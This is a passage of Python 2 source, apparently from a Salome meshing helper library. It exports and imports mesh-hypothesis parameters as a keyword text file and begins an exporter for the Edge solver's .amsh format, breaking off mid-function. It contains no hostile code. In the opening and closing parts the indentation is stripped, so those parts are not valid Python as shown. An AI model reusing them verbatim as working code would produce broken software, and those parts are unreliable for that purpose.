hypothesis_file.write("HEXOTICVERBOSITY:\n%s\n"%(hypothesis.GetHexoticVerbosity()))
hypothesis_file.write("HEXOTICSDMODE:\n%s\n"%(hypothesis.GetHexoticSdMode()))
hypothesis_file.write("TEXTOPTIONS:\n%s\n"%(hypothesis.GetTextOptions()))
hypothesis_file.write("NBLAYERS:\n%s\n"%(hypothesis.GetNbLayers()))
hypothesis_file.write("FIRSTLAYERSIZE:\n%s\n"%(hypothesis.GetFirstLayerSize()))
hypothesis_file.write("DIRECTION:\n%s\n"%(hypothesis.GetDirection()))
hypothesis_file.write("GROWTH:\n%s\n"%(hypothesis.GetGrowth()))
if hypothesis_type == "MG - Tetra Parameters":
hypothesis_file.write("TOMESHHOLES:\n%s\n"%(hypothesis.GetToMeshHoles()))
hypothesis_file.write("TOMAKEGROUPSOFDOMAINS:\n%s\n"%(hypothesis.GetToMakeGroupsOfDomains()))
hypothesis_file.write("OPTIMIZATIONLEVEL:\n%s\n"%(hypothesis.GetOptimizationLevel()))
hypothesis_file.write("INITIALMEMORY:\n%s\n"%(hypothesis.GetInitialMemory()))
hypothesis_file.write("MAXIMUMMEMORY:\n%s\n"%(hypothesis.GetMaximumMemory()))
hypothesis_file.write("WORKINGDIRECTORY:\n%s\n"%(hypothesis.GetWorkingDirectory()))
hypothesis_file.write("VERBOSELEVEL:\n%s\n"%(hypothesis.GetVerboseLevel()))
hypothesis_file.write("STANDARDOUTPUTLOG:\n%s\n"%(hypothesis.GetStandardOutputLog()))
hypothesis_file.write("REMOVELOGONSUCCESS:\n%s\n"%(hypothesis.GetRemoveLogOnSuccess()))
hypothesis_file.write("KEEPFILES:\n%s\n"%(hypothesis.GetKeepFiles()))
hypothesis_file.write("TOCREATENEWNODES:\n%s\n"%(hypothesis.GetToCreateNewNodes()))
hypothesis_file.write("TOUSEBOUNDARYRECOVERYVERSION:\n%s\n"%(hypothesis.GetToUseBoundaryRecoveryVersion()))
hypothesis_file.write("TOREMOVECENTRALPOINT:\n%s\n"%(hypothesis.GetToRemoveCentralPoint()))
hypothesis_file.write("FEMCORRECTION:\n%s\n"%(hypothesis.GetFEMCorrection()))
hypothesis_file.write("GRADATION:\n%s\n"%(hypothesis.GetGradation()))
hypothesis_file.write("TEXTOPTION:\n%s\n"%(hypothesis.GetTextOption()))
if hypothesis_type == "HYBRID_Parameters":
hypothesis_file.write("BOUNDARYLAYERSGROWTH:\n%s\n"%(hypothesis.GetBoundaryLayersGrowth()))
hypothesis_file.write("HEIGHTFIRSTLAYER:\n%s\n"%(hypothesis.GetHeightFirstLayer()))
hypothesis_file.write("NBOFBOUNDARYLAYERS:\n%s\n"%(hypothesis.GetNbOfBoundaryLayers()))
hypothesis_file.write("BOUNDARYLAYERSPROGRESSION:\n%s\n"%(hypothesis.GetBoundaryLayersProgression()))
hypothesis_file.write("COLLISIONMODE:\n%s\n"%(hypothesis.GetCollisionMode()))
hypothesis_file.write("ELEMENTGENERATION:\n%s\n"%(hypothesis.GetElementGeneration()))
hypothesis_file.write("ADDMULTINORMALS:\n%s\n"%(hypothesis.GetAddMultinormals()))
hypothesis_file.write("MULTINORMALSANGLE:\n%s\n"%(hypothesis.GetMultinormalsAngle()))
hypothesis_file.write("SMOOTHNORMALS:\n%s\n"%(hypothesis.GetSmoothNormals()))
hypothesis_file.write("WORKINGDIRECTORY:\n%s\n"%(hypothesis.GetWorkingDirectory()))
hypothesis_file.write("VERBOSELEVEL:\n%s\n"%(hypothesis.GetVerboseLevel()))
hypothesis_file.write("STANDARDOUTPUTLOG:\n%s\n"%(hypothesis.GetStandardOutputLog()))
hypothesis_file.write("REMOVELOGONSUCCESS:\n%s\n"%(hypothesis.GetRemoveLogOnSuccess()))
hypothesis_file.write("KEEPFILES:\n%s\n"%(hypothesis.GetKeepFiles()))
hypothesis_file.write("TEXTOPTION:\n%s\n"%(hypothesis.GetTextOption()))
if hypothesis_type == "ViscousLayers":# 3D
hypothesis_file.write("NUMBERLAYERS:\n%s\n"%(hypothesis.GetNumberLayers()))
hypothesis_file.write("STRETCHFACTOR:\n%s\n"%(hypothesis.GetStretchFactor()))
hypothesis_file.write("TOTALTHICKNESS:\n%s\n"%(hypothesis.GetTotalThickness()))
hypothesis_file.write("METHOD:\n%s\n"%(hypothesis.GetMethod()))
#-
# Close hypothesis file
hypothesis_file.close()
#-
eh = ExportHypotheses# Short alias for ExportHypotheses (cfdmsh two-letter alias convention)
def ImportHypotheses( file = "cfdmsh_hps" ):
	"""
	Description:
		Imports a hypotheses file created with the ExportHypotheses function.
		The file is a sequence of "TYPE:", "NAME:" and parameter keyword lines,
		each followed by its value on the next line. For each "TYPE:" line a new
		hypothesis is created in the current study; every following keyword line
		sets the matching parameter on that hypothesis.
	Arguments:
		# file
			Description: The name of the file to read.
			Type: String
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: "cfdmsh_hps"
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		-
	"""
	if False: pass
	else:# All checks done
		# Open the hypothesis file
		hypothesis_file = open(file, "r")
		#-
		# Read the file
		# The three flags below implement a small state machine: a keyword line
		# arms exactly one flag, and the NEXT line is then consumed as the value.
		is_a_hypothesis_type_line = False
		is_a_hypothesis_name_line = False
		is_a_hypothesis_parameter_line = False
		# Absolute sizes are remembered so the IS*SIZEREL flags (MG - CADSurf)
		# can re-apply them as relative values afterwards.
		min_size = 0.0# This is for MG - CADSurf
		max_size = 0.0#
		phy_size = 0.0#
		for line in hypothesis_file:# For each line in the hypothesis file...
			line = line[:-1]# Delete ending "\n"
			if is_a_hypothesis_type_line == True:# If it is a "type" line...
				# The engine name depends on the hypothesis family.
				if "NETGEN" in line:
					hypothesis = smesh.CreateHypothesis(line, "NETGENEngine")
				elif "MG - CADSurf" in line:
					hypothesis = smesh.CreateHypothesis(line, "BLSURFEngine")
				elif "MG - Tetra Parallel" in line:
					hypothesis = smesh.CreateHypothesis(line, "GHS3DPRLEngine")
				elif "MG - Hexa Parameters" in line:
					hypothesis = smesh.CreateHypothesis(line, "HexoticEngine")
				elif "MG - Tetra Parameters" in line:
					hypothesis = smesh.CreateHypothesis(line, "GHS3DEngine")
				elif "HYBRID" in line:
					hypothesis = smesh.CreateHypothesis(line, "HYBRIDEngine")
				else:
					hypothesis = smesh.CreateHypothesis(line)
			elif is_a_hypothesis_name_line == True:# If it is a "name" line...
				smesh.SetName(hypothesis, line)
			elif is_a_hypothesis_parameter_line == True:# If it is a parameter line...
				# Dispatch the value to the setter matching the keyword read on
				# the previous line. Values are stored as text by
				# ExportHypotheses, hence the float()/int()/bool conversions.
				if parameter_type == "LENGTH:": hypothesis.SetLength(float(line))
				if parameter_type == "PRECISION:": hypothesis.SetPrecision(float(line))
				if parameter_type == "PRESSTIMATEDLENGTH:": hypothesis.SetPreestimatedLength(float(line))
				if parameter_type == "USEPRESSTIMATEDLENGTH:": hypothesis.SetUsePreestimatedLength(line == "True")
				if parameter_type == "STARTLENGTH:": hypothesis.SetStartLength(float(line))
				if parameter_type == "ENDLENGTH:": hypothesis.SetEndLength(float(line))
				if parameter_type == "COMMONRATIO:": hypothesis.SetCommonRatio(float(line))
				if parameter_type == "NBSEGMENTS:": hypothesis.SetNbSegments(ast.literal_eval(line))
				if parameter_type == "POINTS:": hypothesis.SetPoints(ast.literal_eval(line))
				if parameter_type == "NUMBEROFSEGMENTS:":
					# Some distribution types reject this call: best effort.
					try: hypothesis.SetNumberOfSegments(int(line))
					except Exception: pass
				if parameter_type == "DISTRTYPE:": hypothesis.SetDistrType(int(line))
				if parameter_type == "SCALEFACTOR:": hypothesis.SetScaleFactor(float(line))
				if parameter_type == "TABLEFUNCTION:": hypothesis.SetTableFunction(ast.literal_eval(line))
				if parameter_type == "EXPRESSIONFUNCTION:": hypothesis.SetExpressionFunction(str(line))
				if parameter_type == "CONVERSIONMODE:": hypothesis.SetConversionMode(int(line))
				if parameter_type == "DEFLECTION:": hypothesis.SetDeflection(float(line))
				if parameter_type == "MINSIZE:":
					min_size = float(line)# Remembered for ISMINSIZEREL
					hypothesis.SetMinSize(min_size)
				if parameter_type == "MAXSIZE:":
					max_size = float(line)# Remembered for ISMAXSIZEREL
					hypothesis.SetMaxSize(max_size)
				if parameter_type == "FINENESS:":
					# Fineness is a float for NETGEN 1D-2D(-3D) but an int enum
					# for some hypotheses: try float first, fall back to int.
					try: hypothesis.SetFineness(float(line))
					except Exception: hypothesis.SetFineness(int(line))
				if parameter_type == "GROWTHRATE:": hypothesis.SetGrowthRate(float(line))
				if parameter_type == "NBSEGPEREDGE:": hypothesis.SetNbSegPerEdge(float(line))
				if parameter_type == "NBSEGPERRADIUS:": hypothesis.SetNbSegPerRadius(float(line))
				if parameter_type == "USESURFACECURVATURE:": hypothesis.SetUseSurfaceCurvature(line == "True")
				if parameter_type == "QUADALLOWED:": hypothesis.SetQuadAllowed(line == "True")
				if parameter_type == "ALLOWQUADRANGLES:": hypothesis.SetAllowQuadrangles(line == "True")
				if parameter_type == "OPTIMIZE:": hypothesis.SetOptimize(line == "True")
				if parameter_type == "FUSEEDGES:": hypothesis.SetFuseEdges(line == "True")
				if parameter_type == "SECONDORDER:": hypothesis.SetSecondOrder(line == "True")
				if parameter_type == "MAXELEMENTAREA:": hypothesis.SetMaxElementArea(float(line))
				if parameter_type == "MAXELEMENTVOLUME:": hypothesis.SetMaxElementVolume(float(line))
				if parameter_type == "LOCALLENGTH:":
					try:hypothesis.SetLocalLength(float(line))
					except Exception:pass
				if parameter_type == "QUADTYPE:":
					# The export wrote the enum member name: map it back.
					if line == "QUAD_STANDARD":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_STANDARD)
					if line == "QUAD_TRIANGLE_PREF":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_TRIANGLE_PREF)
					if line == "QUAD_QUADRANGLE_PREF":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_QUADRANGLE_PREF)
					if line == "QUAD_QUADRANGLE_PREF_REVERSED":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_QUADRANGLE_PREF_REVERSED)
					if line == "QUAD_REDUCED":hypothesis.SetQuadType(StdMeshersBuilder.QUAD_REDUCED)
				if parameter_type == "NUMBEROFLAYERS:": hypothesis.SetNumberOfLayers(int(line))
				if parameter_type == "NUMBERLAYERS:": hypothesis.SetNumberLayers(int(line))
				if parameter_type == "STRETCHFACTOR:": hypothesis.SetStretchFactor(float(line))
				if parameter_type == "TOTALTHICKNESS:": hypothesis.SetTotalThickness(float(line))
				if parameter_type == "METHOD:":
					if line == "SURF_OFFSET_SMOOTH": hypothesis.SetMethod(StdMeshersBuilder.SURF_OFFSET_SMOOTH)
					if line == "NODE_OFFSET": hypothesis.SetMethod(StdMeshersBuilder.NODE_OFFSET)
					if line == "FACE_OFFSET": hypothesis.SetMethod(StdMeshersBuilder.FACE_OFFSET)
				if parameter_type == "MEDNAME:": hypothesis.SetMEDName(str(line))
				if parameter_type == "NBPART:": hypothesis.SetNbPart(int(line))
				if parameter_type == "KEEPFILES:": hypothesis.SetKeepFiles(line == "True")
				if parameter_type == "BACKGROUND:": hypothesis.SetBackground(line == "True")
				if parameter_type == "MERGESUBDOMAINS:": hypothesis.SetToMergeSubdomains(line == "True")
				if parameter_type == "TAGSUBDOMAINS:": hypothesis.SetToTagSubdomains(line == "True")
				if parameter_type == "OUTPUTINTERFACES:": hypothesis.SetToOutputInterfaces(line == "True")
				if parameter_type == "DISCARDSUBDOMAINS:": hypothesis.SetToDiscardSubdomains(line == "True")
				if parameter_type == "HEXESMINLEVEL:": hypothesis.SetHexesMinLevel(int(line))
				if parameter_type == "HEXESMAXLEVEL:": hypothesis.SetHexesMaxLevel(int(line))
				if parameter_type == "HEXOTICIGNORERIDGES:": hypothesis.SetHexoticIgnoreRidges(line == "True")
				if parameter_type == "HEXOTICINVALIDELEMENTS:": hypothesis.SetHexoticInvalidElements(line == "True")
				if parameter_type == "HEXOTICSHARPANGLETHRESHOLD:": hypothesis.SetHexoticSharpAngleThreshold(float(line))
				if parameter_type == "HEXOTICNBPROC:": hypothesis.SetHexoticNbProc(int(line))
				if parameter_type == "HEXOTICWORKINGDIRECTORY:": hypothesis.SetHexoticWorkingDirectory(str(line))
				if parameter_type == "HEXOTICMAXMEMORY:": hypothesis.SetHexoticMaxMemory(int(line))
				if parameter_type == "HEXOTICVERBOSITY:": hypothesis.SetHexoticVerbosity(int(line))
				if parameter_type == "HEXOTICSDMODE:": hypothesis.SetHexoticSdMode(int(line))
				if parameter_type == "NBLAYERS:": hypothesis.SetNbLayers(int(line))
				if parameter_type == "FIRSTLAYERSIZE:": hypothesis.SetFirstLayerSize(float(line))
				if parameter_type == "DIRECTION:": hypothesis.SetDirection(line == "True")
				if parameter_type == "GROWTH:": hypothesis.SetGrowth(float(line))
				# NOTE: MAXSIZE:, MINSIZE: and KEEPFILES: are already handled
				# above for every hypothesis type (the duplicate handlers that
				# used to sit here called the same setters a second time).
				if parameter_type == "TEXTOPTIONS:": hypothesis.SetTextOptions(str(line))
				if parameter_type == "TOMESHHOLES:": hypothesis.SetToMeshHoles(line == "True")
				if parameter_type == "TOMAKEGROUPSOFDOMAINS:": hypothesis.SetToMakeGroupsOfDomains(line == "True")
				if parameter_type == "OPTIMIZATIONLEVEL:": hypothesis.SetOptimizationLevel(int(line))
				if parameter_type == "INITIALMEMORY:": hypothesis.SetInitialMemory(int(line))
				if parameter_type == "MAXIMUMMEMORY:": hypothesis.SetMaximumMemory(int(line))
				if parameter_type == "WORKINGDIRECTORY:": hypothesis.SetWorkingDirectory(str(line))
				if parameter_type == "VERBOSELEVEL:": hypothesis.SetVerboseLevel(int(line))
				if parameter_type == "STANDARDOUTPUTLOG:": hypothesis.SetStandardOutputLog(line == "True")
				if parameter_type == "REMOVELOGONSUCCESS:": hypothesis.SetRemoveLogOnSuccess(line == "True")
				if parameter_type == "TOCREATENEWNODES:": hypothesis.SetToCreateNewNodes(line == "True")
				if parameter_type == "TOUSEBOUNDARYRECOVERYVERSION:": hypothesis.SetToUseBoundaryRecoveryVersion(line == "True")
				if parameter_type == "TOREMOVECENTRALPOINT:": hypothesis.SetToRemoveCentralPoint(line == "True")
				if parameter_type == "FEMCORRECTION:": hypothesis.SetFEMCorrection(line == "True")
				if parameter_type == "GRADATION:": hypothesis.SetGradation(float(line))
				if parameter_type == "TEXTOPTION:": hypothesis.SetTextOption(str(line))
				if parameter_type == "BOUNDARYLAYERSGROWTH:": hypothesis.SetBoundaryLayersGrowth(int(line))
				if parameter_type == "HEIGHTFIRSTLAYER:": hypothesis.SetHeightFirstLayer(float(line))
				if parameter_type == "NBOFBOUNDARYLAYERS:": hypothesis.SetNbOfBoundaryLayers(int(line))
				if parameter_type == "BOUNDARYLAYERSPROGRESSION:": hypothesis.SetBoundaryLayersProgression(float(line))
				if parameter_type == "COLLISIONMODE:": hypothesis.SetCollisionMode(int(line))
				if parameter_type == "ELEMENTGENERATION:": hypothesis.SetElementGeneration(int(line))
				if parameter_type == "ADDMULTINORMALS:": hypothesis.SetAddMultinormals(line == "True")
				if parameter_type == "MULTINORMALSANGLE:": hypothesis.SetMultinormalsAngle(float(line))
				if parameter_type == "SMOOTHNORMALS:": hypothesis.SetSmoothNormals(line == "True")
				if parameter_type == "PHYSICALMESH:": hypothesis.SetPhysicalMesh(int(line))
				if parameter_type == "GEOMETRICMESH:": hypothesis.SetGeometricMesh(int(line))
				if parameter_type == "ANGLEMESH:": hypothesis.SetAngleMesh(float(line))
				if parameter_type == "CHORDALERROR:": hypothesis.SetChordalError(float(line))
				if parameter_type == "PHYSIZE:":
					phy_size = float(line)# Remembered for ISPHYSIZEREL
					hypothesis.SetPhySize(phy_size)
				if parameter_type == "ISPHYSIZEREL:":
					# Re-apply the remembered absolute value as a relative one.
					if line == "True": hypothesis.SetPhySizeRel(phy_size)
				if parameter_type == "ISMINSIZEREL:":
					if line == "True": hypothesis.SetMinSizeRel(min_size)
				if parameter_type == "ISMAXSIZEREL:":
					if line == "True": hypothesis.SetMaxSizeRel(max_size)
				if parameter_type == "QUADRATICMESH:": hypothesis.SetQuadraticMesh(line == "True")
				if parameter_type == "ANISOTROPIC:": hypothesis.SetAnisotropic(line == "True")
				if parameter_type == "ANISOTROPICRATIO:": hypothesis.SetAnisotropicRatio(float(line))
				if parameter_type == "REMOVETINYEDGES:": hypothesis.SetRemoveTinyEdges(line == "True")
				if parameter_type == "TINYEDGELENGTH:": hypothesis.SetTinyEdgeLength(float(line))
				if parameter_type == "BADELEMENTREMOVAL:": hypothesis.SetBadElementRemoval(line == "True")
				if parameter_type == "BADELEMENTASPECTRATIO:": hypothesis.SetBadElementAspectRatio(float(line))
				if parameter_type == "OPTIMIZEMESH:": hypothesis.SetOptimizeMesh(line == "True")
				if parameter_type == "OPTIONVALUES:": hypothesis.SetOptionValues(ast.literal_eval(line))
				if parameter_type == "PRECADOPTIONVALUES:": hypothesis.SetPreCADOptionValues(ast.literal_eval(line))
				if parameter_type == "TOPOLOGY:": hypothesis.SetTopology(int(line))# int
				if parameter_type == "PRECADMERGEEDGES:": hypothesis.SetPreCADMergeEdges(line == "True")
				if parameter_type == "PRECADPROCESS3DTOPOLOGY:": hypothesis.SetPreCADProcess3DTopology(line == "True")
				if parameter_type == "PRECADDISCARDINPUT:": hypothesis.SetPreCADDiscardInput(line == "True")
				if parameter_type == "VERBOSITY:": hypothesis.SetVerbosity(int(line))
				if parameter_type == "GMFFILE:": hypothesis.SetGMFFile(str(line))
			# The current line has been consumed: disarm all flags, then decide
			# what the NEXT line will be.
			is_a_hypothesis_type_line = False
			is_a_hypothesis_name_line = False
			is_a_hypothesis_parameter_line = False
			if line.find("TYPE:") == 0:
				is_a_hypothesis_type_line = True
			elif line.find("NAME:") == 0:
				is_a_hypothesis_name_line = True
			elif line in [
				"LENGTH:",
				"PRECISION:",
				"PRESSTIMATEDLENGTH:",
				"USEPRESSTIMATEDLENGTH:",
				"STARTLENGTH:",
				"ENDLENGTH:",
				"COMMONRATIO:",
				"NBSEGMENTS:",
				"POINTS:",
				"NUMBEROFSEGMENTS:",
				"DISTRTYPE:",
				"SCALEFACTOR:",
				"TABLEFUNCTION:",
				"EXPRESSIONFUNCTION:",
				"CONVERSIONMODE:",
				"DEFLECTION:",
				"MINSIZE:",
				"MAXSIZE:",
				"FINENESS:",
				"GROWTHRATE:",
				"NBSEGPEREDGE:",
				"NBSEGPERRADIUS:",
				"USESURFACECURVATURE:",
				"QUADALLOWED:",
				"OPTIMIZE:",
				"FUSEEDGES:",
				"ALLOWQUADRANGLES:",
				"SECONDORDER:",
				"MAXELEMENTAREA:",
				"MAXELEMENTVOLUME:",
				"LOCALLENGTH:",
				"QUADTYPE:",
				"NUMBEROFLAYERS:",
				"NUMBERLAYERS:",
				"STRETCHFACTOR:",
				"TOTALTHICKNESS:",
				"METHOD:",
				"MEDNAME:",
				"NBPART:",
				"KEEPFILES:",
				"BACKGROUND:",
				"MERGESUBDOMAINS:",
				"TAGSUBDOMAINS:",
				"OUTPUTINTERFACES:",
				"DISCARDSUBDOMAINS:",
				"HEXESMINLEVEL:",
				"HEXESMAXLEVEL:",
				"HEXOTICIGNORERIDGES:",
				"HEXOTICINVALIDELEMENTS:",
				"HEXOTICMAXMEMORY:",
				"HEXOTICNBPROC:",
				"HEXOTICSDMODE:",
				"NBLAYERS:",
				"FIRSTLAYERSIZE:",
				"DIRECTION:",
				"GROWTH:",
				"HEXOTICSHARPANGLETHRESHOLD:",
				"HEXOTICVERBOSITY:",
				"HEXOTICWORKINGDIRECTORY:",
				"TEXTOPTIONS:",
				"TOMESHHOLES:",
				"TOMAKEGROUPSOFDOMAINS:",
				"OPTIMIZATIONLEVEL:",
				"INITIALMEMORY:",
				"MAXIMUMMEMORY:",
				"WORKINGDIRECTORY:",
				"VERBOSELEVEL:",
				"STANDARDOUTPUTLOG:",
				"REMOVELOGONSUCCESS:",
				"TOCREATENEWNODES:",
				"TOUSEBOUNDARYRECOVERYVERSION:",
				"TOREMOVECENTRALPOINT:",
				"FEMCORRECTION:",
				"GRADATION:",
				"TEXTOPTION:",
				"BOUNDARYLAYERSGROWTH:",
				"HEIGHTFIRSTLAYER:",
				"NBOFBOUNDARYLAYERS:",
				"BOUNDARYLAYERSPROGRESSION:",
				"COLLISIONMODE:",
				"ELEMENTGENERATION:",
				"ADDMULTINORMALS:",
				"MULTINORMALSANGLE:",
				"SMOOTHNORMALS:",
				"PHYSICALMESH:",
				"GEOMETRICMESH:",
				"ANGLEMESH:",
				"CHORDALERROR:",
				"PHYSIZE:",
				"ISPHYSIZEREL:",
				"ISMINSIZEREL:",
				"ISMAXSIZEREL:",
				"QUADRATICMESH:",
				"ANISOTROPIC:",
				"ANISOTROPICRATIO:",
				"REMOVETINYEDGES:",
				"TINYEDGELENGTH:",
				"BADELEMENTREMOVAL:",
				"BADELEMENTASPECTRATIO:",
				"OPTIMIZEMESH:",
				"OPTIONVALUES:",
				"PRECADOPTIONVALUES:",
				"TOPOLOGY:",
				"PRECADMERGEEDGES:",
				"PRECADPROCESS3DTOPOLOGY:",
				"PRECADDISCARDINPUT:",
				"VERBOSITY:",
				"GMFFILE:",
				]:
				is_a_hypothesis_parameter_line = True
				parameter_type = line
		#-
		# Update the study tree
		salome.sg.updateObjBrowser(1)
		#-
		# Close hypothesis file
		hypothesis_file.close()
		#-
ih = ImportHypotheses# Short alias for ImportHypotheses (cfdmsh two-letter alias convention)
def ExportAmshFile( mesh = None, file = None, only = [None], ignore = [None], help = False ):
"""
Description:
Exports a mesh into an .amsh file readable by the CFD solver Edge 5.0.0.
Arguments:
# mesh
Description: The mesh to export.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name without extension of the amsh file to write. If equals None, the name of the mesh in the study tree is taken.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# only
Description: The list of names of groups to export, excluding the others.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# ignore
Description: The list of names of groups to ignore.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# help
Description: Activates the generation of a help file giving relation between Edge and Salome node IDs (slows down the mesh export).
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
The mesh has to be computed and to contain groups describing the desired boundary conditions (inlet, outlet, wall, farfield, etc.).
Warning: In the case the mesh is the result of a mesh fusion, the nodes and then the elements of the meshes to fuse have to be reordered before the fusion, else Edge can detect a Max dev. of accum. surface vector superior to its allowed tolerance during the preprocessor command execution.
"""
# Get the input shape(s)
mesh = GetGUISelection(mesh, uniq = True)
mesh = GetObject(mesh, "SMESH")
#-
# Check the input shape existence
if "error" in [mesh] or None in [mesh]: return
#-
else:# All checks done
def WriteInColumns(file, table, nb_columns, nb_identation_spaces, nb_spaces = 6):
n = 0
for element in table:
if n%nb_columns == 0:
for s in range(nb_identation_spaces):
file.write(" ")
else:
for s in range(nb_spaces):
file.write(" ")
if type(element) == type("string"):
file.write("%s"%(element))
elif type(element) == type(1.0):
file.write("%.16f"%(element))
elif type(element) == type(1):
file.write("%i"%(element))
if (n + 1)%nb_columns == 0 or n == len(table) - 1:
file.write("\n")
n += 1
def powerOfTen(figure):
figure *= 1.0
n = 0
if figure != 0:
if abs(figure) < 1:
while abs(figure) < 1:
figure *= 10
n -= 1
if abs(figure) >= 10:
while abs(figure) >= 10:
figure /= 10
n += 1
return figure, n
if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
try:
mesh = smesh.Mesh(mesh)
except:
pass
else:
print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
# Get the mesh name
mesh_name = mesh.GetName()
#-
# Renumber elements and nodes
mesh.RenumberNodes()
mesh.RenumberElements()
#-
# Get nodes number and IDs
nb_nodes_in_mesh = mesh.NbNodes()
node_ids_in_mesh = mesh.GetNodesId()
#-
# Get edges IDs
edge_ids_in_mesh = mesh.GetElementsByType(SMESH.EDGE)
nb_edges_in_mesh = mesh.NbEdges()
#-
# Get faces IDs
face_ids_in_mesh = mesh.GetElementsByType(SMESH.FACE)
nb_faces_in_mesh = mesh.NbFaces()
nb_triangles_in_mesh = mesh.NbTriangles()
nb_quadrangles_in_mesh = mesh.NbQuadrangles()
#-
# Get volumes IDs
nb_volumes_in_mesh = mesh.NbVolumes()
nb_tetrahedrons_in_mesh = mesh.NbTetras()
nb_pyramids_in_mesh = mesh.NbPyramids()
nb_prisms_in_mesh = mesh.NbPrisms()
nb_hexahedrons_in_mesh = mesh.NbHexas()
volume_ids_in_mesh = mesh.GetElementsByType(SMESH.VOLUME)
#-
# Get mesh dimension
if nb_volumes_in_mesh != 0:
mesh_dimension = 3
nb_elements_in_domain = nb_volumes_in_mesh
else:
mesh_dimension = 2
nb_elements_in_domain = nb_faces_in_mesh
#-
# Get groups
group_names = mesh.GetGroupNames()
groups = mesh.GetGroups()
#-
# Sort groups
sorted_groups = []
if only != [None]:
for group in groups:
group_name = group.GetName()
if group_name in only:
sorted_groups.append(group)
groups = sorted_groups
sorted_groups = []
if ignore != [None]:
for group in groups:
group_name = group.GetName()
if group_name not in ignore:
sorted_groups.append(group)
groups = sorted_groups
# Get the number of groups
nb_groups = len(groups)
# Get group types
group_types = []
for group in groups:
group_type = str(group.GetType())
group_types.append(group_type)
#-
# Open the amsh file
date = time.asctime(time.localtime())
if file == None:
file = mesh_name
amsh_file = open("%s.amsh"%(file), "w")
amsh_file.write("unstr_grid_data N 0 0 2\n")
amsh_file.write(" title L 1 1 0\n")
amsh_file.write(" '%s exported from Salome on %s'\n"%(mesh_name, date))
#-
# Open the help file
if help == True:
mesh_file = open("%s.help"%(file), "w")
mesh_file.write("%s\n"%(date))
mesh_file.write("'%s' '%s'\n"%(mesh_name, file))
mesh_file.write("NODES EDGES TRIA QUAD TETRA PYRA PRISM HEXA\n")
mesh_file.write("%i %i %i %i %i %i %i %i\n"%(nb_nodes_in_mesh, nb_edges_in_mesh, nb_triangles_in_mesh, nb_quadrangles_in_mesh, nb_tetrahedrons_in_mesh, nb_pyramids_in_mesh, nb_prisms_in_mesh, nb_hexahedrons_in_mesh))
for n in range(nb_groups):
mesh_file.write("'%s' "%(mesh.GetGroupNames()[n]))
mesh_file.write("\n")
mesh_file.write("NODES\nID X Y Z\n")
#-
# Get the region ffa dimension
region_ffa_dimension = 2 + nb_groups
if mesh_dimension == 2:
if nb_triangles_in_mesh > 0:
region_ffa_dimension += 1
if nb_quadrangles_in_mesh > 0:
region_ffa_dimension += 1
elif mesh_dimension == 3:
if nb_tetrahedrons_in_mesh > 0:
region_ffa_dimension += 1
if nb_pyramids_in_mesh > 0:
region_ffa_dimension += 1
if nb_prisms_in_mesh > 0:
region_ffa_dimension += 1
if nb_hexahedrons_in_mesh > 0:
region_ffa_dimension += 1
amsh_file.write(" region N 0 0 %i\n"%(region_ffa_dimension))
amsh_file.write(" region_name L 1 1 0\n")
amsh_file.write(" 'volume_elements'\n")
amsh_file.write(" coordinates DF %i %i 0\n"%(mesh_dimension, nb_nodes_in_mesh))
#-
print "[i] Writing node coordinates... (%s nodes)"%(nb_nodes_in_mesh)
# Get the node coordinates
node_coordinates = []
for n in range(mesh_dimension):
node_coordinates.append([])
#-
# Write the node coordinates
for node_id in node_ids_in_mesh:
if help == True:
mesh_file.write("%i %f %f %f\n"%(node_id, mesh.GetNodeXYZ(node_id)[0], mesh.GetNodeXYZ(node_id)[1], mesh.GetNodeXYZ(node_id)[2]))
for n in range(mesh_dimension):
node_coordinate = mesh.GetNodeXYZ(node_id)[n]
[node_float_coordinate, node_coordinate_power_of_ten] = powerOfTen(node_coordinate)
node_coordinate = "%.16fE%i"%(node_float_coordinate, node_coordinate_power_of_ten)
node_coordinates[n].append(node_coordinate)
figures = []
for n in range(mesh_dimension):
figures += node_coordinates[n]
WriteInColumns(amsh_file, figures, mesh_dimension, 18)
#-
# Get the group element definition
print "[i] Writing definition of group elements... (%s groups)"%(nb_groups)
if help == True:
mesh_file.write("GROUPS\n")
for group in groups:# For each group of the mesh
group_name = group.GetName()
element_ids_in_group = group.GetListOfID()
triangle_ids_in_group = []
quadrangle_ids_in_group = []
edges_ids_in_group = []
for element_id_in_group in element_ids_in_group:
nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_group)
if mesh_dimension == 3:
if nb_nodes_in_element == 3:
triangle_ids_in_group.append(element_id_in_group)
if nb_nodes_in_element == 4:
quadrangle_ids_in_group.append(element_id_in_group)
elif mesh_dimension == 2:
edges_ids_in_group.append(element_id_in_group)
nb_types_in_group = 0
types_in_groups = 0 #-1 = edges ; + 1 = triangles ; + 2 = quadrangles
nb_triangles_in_group = len(triangle_ids_in_group)
nb_quadrangles_in_group = len(quadrangle_ids_in_group)
nb_edges_in_group = len(edges_ids_in_group)
if nb_triangles_in_group > 0:
types_in_groups += 1
nb_types_in_group += 1
if nb_quadrangles_in_group > 0:
types_in_groups += 2
nb_types_in_group += 1
if nb_edges_in_group > 0:
types_in_groups -= 1
nb_types_in_group += 1
amsh_file.write(" boundary N 0 0 %i\n"%(nb_types_in_group + 1))
amsh_file.write(" boundary_name L 1 1 0\n")
amsh_file.write(" '%s'\n"%(group_name))
if help == True:
mesh_file.write("'%s'\n"%(group_name))
for n in range(nb_types_in_group):
amsh_file.write(" belem_group N 0 0 2\n")
amsh_file.write(" bound_elem_type L 1 1 0\n")
if types_in_groups == -1: # edges
if help == True:
mesh_file.write("EDGES\n")
element_ids_in_group = edges_ids_in_group
nb_elements_in_group = nb_edges_in_group
